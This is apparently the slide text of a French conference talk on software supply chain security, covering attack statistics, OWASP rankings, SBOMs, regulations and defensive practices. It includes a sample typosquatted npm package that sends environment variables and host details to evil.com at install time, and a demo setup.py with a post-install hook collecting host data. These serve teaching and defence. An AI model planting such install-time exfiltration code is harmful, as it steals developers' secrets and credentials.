Who Am I ?

Agenda

Pourquoi cette présentation ?

Objectifs

1. Comprendre les mécanismes d'attaque réels
2. Identifier les vulnérabilités dans vos projets
3. Mettre en place des solutions concrètes

Bonus

• Checklist de sécurisation

Introduction : La Supply Chain, notre talon d'Achille

Le problème

• En moyenne, 85% du code d'une application provient de dépendances externes
• Les attaques de supply chain ont augmenté de +900% entre 2020 et 2025 (Sonatype)
• 5 packages npm malveillants publiés par jour en moyenne (Socket.dev)
• Temps médian avant détection : 45 jours (Veracode, amélioration grâce à l'IA!)
• Chaque projet moderne dépend de centaines, voire milliers de packages

Le constat alarmant

Quelques chiffres qui font peur

• NPM : 2.5 millions de packages
• PyPI : 500 000+ packages
• Maven Central : 12 millions d'artifacts

Le risque

Une seule dépendance compromise = toute votre chaîne de production exposée

OWASP Top 10 2025 : Supply Chain au podium !

La montée en puissance

6 novembre 2025 : Publication de l'OWASP Top 10 2025 RC1

A03: Software Supply Chain Failures

• 2021 : A06 (Vulnerable & Outdated Components)
• 2025 : A03 (Software Supply Chain Failures) → +3 places !

Données analysées

• 2,8 millions d'applications testées
• 589 CWEs cartographiées
• 175 000 enregistrements CVE analysés
• 12 organisations contributrices

L'OWASP Top 10 combine données terrain ET préoccupations de la communauté

Shai-Hulud Worm (Septembre 2025) - Le ver qui rêvait de devenir viral

Source : KrebsOnSecurity

Exemple concret : Package malveillant

// Package "loadash" malveillant
const https = require('https');
const os = require('os');

// Exfiltration des données
function exfiltrate() {
  const data = {
    hostname: os.hostname(),
    user: os.userInfo().username,
    env: process.env,
    cwd: process.cwd()
  };
  
  https.request('https://evil.com/collect', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'}
  }).end(JSON.stringify(data));
}

// Exécuté lors de l'installation
exfiltrate();

// Export des fonctions de lodash pour ne pas éveiller les soupçons
module.exports = require('lodash');

Démonstration : Package malveillant

Création d'un package typosquatting

# setup.py - Package "requestes" (typo de requests)
import socket
import os
from setuptools import setup
from setuptools.command.install import install

class PostInstallCommand(install):
    def run(self):
        # Code malveillant exécuté à l'installation
        hostname = socket.gethostname()
        user = os.getenv('USER', 'unknown')
        
        # Simulation d'exfiltration (fichier local pour la démo)
        with open('/tmp/stolen_data.txt', 'w') as f:
            f.write(f"Hostname: {hostname}\n")
            f.write(f"User: {user}\n")
            f.write(f"PWD: {os.getcwd()}\n")
        
        install.run(self)

setup(
    name='requestes',
    version='2.31.0',  # Version identique à requests
    cmdclass={'install': PostInstallCommand},
    description='HTTP library (FAKE - DEMO ONLY)',
    py_modules=['requestes']
)

NPM Comment se protéger ?

Implémentez des niveaux de confiance dans vos pipelines

� Mettez en place des SBOM (Software Bill of Materials)

Formats SBOM standards

{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "version": 1,
  "components": [
    {
      "type": "library",
      "name": "requests",
      "version": "2.31.0",
      "purl": "pkg:pypi/requests@2.31.0",
      "hashes": [
        {
          "alg": "SHA-256",
          "content": "942c5a758f98d7c7..."
        }
      ]
    }
  ]
}

SPDXVersion: SPDX-2.2
DataLicense: CC0-1.0
SPDXID: SPDXRef-DOCUMENT
DocumentName: example-project
DocumentNamespace: http://example.com/spdxdocs/example-project-1.0
Creator: Tool: sbom-generator-1.0
Created: 2025-10-01T12:00:00Z
PackageName: example-package

SPDXID: SPDXRef-Package-example

PackageVersion: 1.0.0

PackageSupplier: Organization: ExampleOrg

PackageDownloadLocation: NOASSERTION

FilesAnalyzed: false

PackageLicenseConcluded: NOASSERTION

PackageLicenseDeclared: NOASSERTION

PackageCopyrightText: NOASSERTION

FileName: src/main.py

SPDXID: SPDXRef-File-main.py

FileChecksum: SHA1: 2fd4e1c67a2d28fced849ee1bb76e7391b93eb12

FileCopyrightText: NOASSERTION

FileLicenseConcluded: NOASSERTION

FileLicenseInfoInFile: NOASSERTION

Sécuriser vos GitHub Actions

Audit de vos workflows

Méthode d’audit (simple et efficace)

Outils open-source recommandés (et comment s’y prendre)

Formation et Sensibilisation

Pour les développeurs

• Reconnaissance des packages malveillants
• Vérification avant installation
• Bonnes pratiques de gestion des dépendances
• Utilisation des outils de scanning

Pour les DevOps/SRE

• Configuration sécurisée des pipelines
• Monitoring des dépendances en production
• Gestion des incidents supply chain

Pour le management

• Risques business liés à la supply chain
• ROI des investissements sécurité
• Conformité réglementaire

Instaurer une culture Sécurité dans les équipes

Culture Sécurité	Mise en place de Security Champions
Principes clés : Shift Left Security : — intégrer la sécurité dès la conception - automatiser des tests dans le pipeline CI. Blameless Post-Mortems : — apprendre des incidents sans blâmer - améliorer les process. Security Champions : — désigner des ambassadeurs dans chaque équipe pour relayer et former. KPIs Supply Chain Security	- Formé aux enjeux de sécurité - Point de contact entre dev et sécurité - Évangéliste des bonnes pratiques - Revue des aspects sécurité dans les PR - Veille technologique sur les menaces

ANSSI - Guide de la Supply Chain

5 axes principaux

1. Gouvernance de la supply chain
2. Sélection et évaluation des fournisseurs
3. Sécurisation du développement logiciel
4. Gestion des vulnérabilités
5. Réponse aux incidents

Pour le développement logiciel

NIST - Framework de référence

Publié : Mai 2022

Objectifs

• Identifier les risques supply chain
• Mettre en place des contrôles
• Assurer la résilience de la chaîne

4 groupes de pratiques

Cyber Resilience Act (CRA)

Nouveau règlement européen (2024)

Objectifs

• Améliorer la sécurité des produits numériques
• Imposer des obligations aux fabricants
• Assurer la transparence de la chaîne

Exigences clés pour la supply chain

Article 10 : Cybersecurity requirements

• SBOM obligatoire pour tous les produits
• Vulnérabilités doivent être documentées
• Mises à jour de sécurité garanties (min. 5 ans)

Article 11 : Vulnerability handling

• Délais de correction définis
• Notification aux utilisateurs
• Reporting à l'ENISA

NIS2 Directive (Network and Information Security)

Renforcement de la cybersécurité en Europe

Entrée en vigueur : Octobre 2024

Impact sur la supply chain

Article 21 : Gestion des risques

Les entités essentielles et importantes doivent :

1. Évaluer les risques supply chain
2. Mettre en place des mesures de sécurité
3. Gérer les relations avec les fournisseurs
4. Assurer la continuité d'activité

Obligations spécifiques

• Due diligence sur les fournisseurs critiques
• Documentation des composants tiers
• Notification des incidents (24h)
• Sanctions en cas de non-conformité (jusqu'à 10M€)

Executive Order 14028 (USA)

Improving the Nation's Cybersecurity (2021)

Section 4 : Software Supply Chain Security

Exigences pour les fournisseurs du gouvernement US

1. SBOM pour tous les logiciels
2. Attestation de conformité aux pratiques sécurisées
3. Utilisation d'outils de scanning automatiques
4. Traçabilité complète de la chaîne de build

Impact mondial

• Standard de fait pour les entreprises internationales
• Influence sur les frameworks (NIST SSDF)
• Adoption par le secteur privé

Matrice de conformité

Comparaison des exigences

Exigence	ANSSI	NIST	CRA	NIS2	EO 14028
SBOM
Scan vulnérabilités
Due diligence fournisseurs
Notification incidents
Délai de correction
Sanctions financières

Légende : Obligatoire | Recommandé | Non spécifié

OWASP Top 10 CI/CD Security Risks

Spécifique à la chaîne CI/CD

Top 3 risques

1. CICD-SEC-1: Insufficient Flow Control Mechanisms

   • Exécution de code non approuvé
   • Bypass des validations

2. CICD-SEC-3: Dependency Chain Abuse

   • Packages malveillants
   • Typosquatting
   • Dependency confusion

3. CICD-SEC-4: Poisoned Pipeline Execution (PPE)

   • Injection dans les workflows
   • Modification des pipelines
   • Exfiltration de secrets

� Ma Toolbox Anti- Toxique

Autres projets OWASP utiles

Ressources complémentaires

Cheat Sheet Series

• Software Supply Chain Security
• Vulnerable Dependency Management

OWASP Juice Shop

• Application volontairement vulnérable
• Inclut des challenges supply chain
• Parfait pour la formation

OWASP SAMM

• Software Assurance Maturity Model
• Framework de maturité en sécurité
• Section dédiée à la supply chain

OWASP Security Champions Playbook

• Guide pour mettre en place un programme
• Templates et ressources

Action Items pour 2026

5 actions concrètes

1. Générez vos SBOM et gardez-les à jour
2. Visez SLSA Level 2+ pour vos builds critiques
3. Auditez vos pipelines CI/CD comme vous auditez votre code
4. Monitorer en continu avec des outils type Dependency-Track
5. Formez vos équipes aux risques supply chain

"Dans le monde moderne, la sécurité de votre application dépend autant de la qualité de VOS dépendances que de VOTRE code." – PandaHack (2021)

Après 28 ans en cybersécurité (dont 20ans dans le code)

Priorisez

Vous ne pouvez pas tout sécuriser d'un coup

Commencez par vos assets critiques

Impliquez les équipes

La sécurité n'est pas QUE le job de l'équipe sécu

Faites des développeurs vos alliés

Automatisez

Ce qui n'est pas automatisé ne sera pas fait

Intégrez la sécurité dans le workflow

Mesurez

On ne peut améliorer que ce qu'on mesure

Définissez des KPIs clairs